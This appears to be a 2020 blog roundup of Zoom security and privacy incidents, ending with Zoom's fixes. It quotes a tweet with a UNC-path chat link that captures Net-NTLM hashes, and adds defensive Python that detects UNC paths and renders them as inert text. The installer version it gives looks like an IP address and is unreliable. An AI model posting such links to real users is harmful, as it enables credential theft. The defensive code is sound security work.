The controversial app Zoom has been making headlines in the cybersecurity world recently. The app has become hugely popular since the COVID-19 outbreak started; however, its security has repeatedly been called into question in cybersecurity news.
Videoconferencing software company Zoom provides an online communication platform for audio and video conferencing, online meetings, and chatting.
With the COVID-19 pandemic going on, videoconferencing apps like Zoom have increased immensely in popularity as millions of employees now work from home and people are forced to communicate online only. Threat actors see this situation as the best opportunity to exploit the app and users’ data. Threat Hunting has compiled a full report on everything Zoom has been involved with since the COVID-19 pandemic began.
UNC path injection vulnerability could result in credentials theft
On March 23, security researcher @_g0dmode warned about a vulnerability affecting the Zoom Windows client. The flaw in the chat feature (UNC path injection) could allow attackers to steal the Windows login credentials of users.
When a chat message is sent, any URLs in it, including Windows UNC paths of the form \\server\share, are converted into clickable hyperlinks; this could allow attackers to deliver malware and steal credentials.
Attacks exploiting the UNC path injection vulnerability use the SMBRelay technique: when the Windows client follows such a link and connects to a remote SMB server, it can expose the user’s username and NTLM password hash to that server.
#Zoom chat allows you to post links such as \\x.x.x.x\xyz to attempt to capture Net-NTLM hashes if clicked by other users.
— Mitch (@_g0dmode) March 23, 2020
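The defensive counterpart to the chat behaviour described above, as an added example that is not part of the original article or of Zoom’s code: a message renderer that only hyperlinks http(s) URLs and leaves UNC paths as inert text, plus a detector that flags UNC paths in chat logs. The sample messages are constructed.

```python
import re
from html import escape

# Constructed sample chat messages (not taken from the original post).
SAMPLE_MESSAGES = [
    "Agenda: https://example.com/notes",
    r"See the slides at \\203.0.113.7\share\deck.pptx",
    r"Mixed: http://example.com and \\fileserver\public",
]

# A UNC path: two backslashes, a host, a backslash, a share name, optional rest.
UNC_PATH_RE = re.compile(r"\\\\[^\\\s]+\\[^\s\\]+(?:\\[^\s]*)?")
# Only web URLs with an explicit http(s) scheme are ever turned into links.
HTTP_URL_RE = re.compile(r"https?://[^\s<>\"']+")


def find_unc_paths(message):
    """Detection: return every UNC path found in a chat message."""
    return UNC_PATH_RE.findall(message)


def render_message(message):
    """Mitigation: render a chat message to HTML, hyperlinking only http(s) URLs.

    UNC paths are emitted as plain, HTML-escaped text, so clicking anywhere in
    the rendered message can never make the viewer's machine open an SMB
    connection (and leak a Net-NTLM hash) to a host named in the message.
    """
    out, pos = [], 0
    for m in HTTP_URL_RE.finditer(message):
        out.append(escape(message[pos:m.start()]))
        url = escape(m.group(0), quote=True)
        out.append(f'<a href="{url}">{url}</a>')
        pos = m.end()
    out.append(escape(message[pos:]))
    return "".join(out)


def scan_messages(messages):
    """Return (message, [unc paths]) pairs for messages that carry UNC paths."""
    hits = []
    for msg in messages:
        paths = find_unc_paths(msg)
        if paths:
            hits.append((msg, paths))
    return hits


if __name__ == "__main__":
    for msg, paths in scan_messages(SAMPLE_MESSAGES):
        print(f"UNC path(s) in chat: {paths}")
        print(f"  safe rendering: {render_message(msg)}")
```

On the endpoint side, the same class of leak is also contained by blocking outbound SMB (TCP 445) at the perimeter and restricting outgoing NTLM to remote servers via Group Policy.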
The Facebook data-sharing feature
On March 26, Motherboard published an analysis of Zoom’s Facebook data-sharing feature. The report says that the iOS version of Zoom sends users’ analytics data to Facebook, even if the users don’t have a Facebook account. This practice is not uncommon: the Facebook SDK lets users sign in to the app with their Facebook credentials, but it also shares users’ data with Facebook.
Zoom domains could lead to malware installation
On March 30, the cybersecurity firm CheckPoint published a research report saying that “a major increase in new domain registrations with names including ‘Zoom’” had been witnessed.
“Since the beginning of the year, more than 1700 new domains were registered and 25% of them were registered in the past week. Out of these registered domains, 4% have been found to contain suspicious characteristics,” CheckPoint says.
CheckPoint experts have also detected malicious files that, if executed, could lead to the installation of the InstallCore PUA (potentially unwanted application), which in turn could install additional malware.
Zoom’s data-mining feature grants access to LinkedIn profiles
According to a New York Times investigation published on April 2, a data mining feature allowed users to snoop on other users’ LinkedIn profile data.
“A data-mining feature on Zoom allowed some participants to surreptitiously have access to LinkedIn profile data about other users — without Zoom asking for their permission during the meeting or even notifying them that someone else was snooping on them,” reads the New York Times report.
“Once a Zoom user enabled the feature, that person could quickly and covertly view LinkedIn profile data — like locations, employer names and job titles — for people in the Zoom meeting by clicking on a LinkedIn icon next to their names,” the New York Times explained.
Zoom web client outage
Around the beginning of April, users started reporting that they were unable to access the Zoom web client, which was displaying a ‘403 Forbidden’ error. Some users also reported timeout errors saying that “Your connection has timed out and you cannot join the meetings. Verify your network connectivity and try again.” The errors were mostly affecting users on the US East Coast and in Western Europe.
Zoom stated that they were working to get the Web Client and Web SDK back online.
It is not all Zoom’s fault
Zoom has become the perfect target for trolls and threat actors to crash online meetings (Zoombombing) and deliver malware.
With Zoom’s increase in popularity during the COVID-19 pandemic, threat actors are now taking advantage of the popular app to distribute malware such as cryptominers, RATs, and adware.
Fake Zoom installer drops coinminers
On April 3, Trend Micro published a report saying that they had discovered a fake Zoom installer capable of installing cryptominers on victims’ computers.
“We found a Coinminer bundled with the legitimate installer of video conferencing app Zoom, luring users who want to install the software but end up unwittingly downloading a malicious file.”
The malicious Zoom installer is AutoIt-compiled malware, detected as Trojan.Win32.MOOZ.THCCABO, that drops three coinminers; it also bundles a legitimate Zoom installer, version 18.104.22.168, so the victim sees a normal installation.
Other than the major security problems, users were facing other inconveniences as well.
There have been numerous reports on Zoombombing saying that users’ meetings were invaded with pornographic images, hate speech, or even threats.
Zoombombing is when an uninvited person joins a Zoom meeting and starts throwing racial slurs or sharing pornographic and offensive imagery.
Anyone, including Zoombombers, can join a public meeting once they have the link, so it is recommended to be cautious about sharing public Zoom meeting links on social media.
Zoom is resolving the problems
Zoom fixed the problems regarding Windows login credentials theft, and they also removed the Facebook SDK feature to protect users’ safety.
They added a Waiting Room feature which allows meeting hosts to accept or reject participants. Zoom also removed meeting IDs to prevent them from being exposed in screenshots. These measures were taken to prevent Zoombombing incidents as much as possible.
Zoom has also formed a CISO Council and an Advisory Board to review and resolve the recent security issues.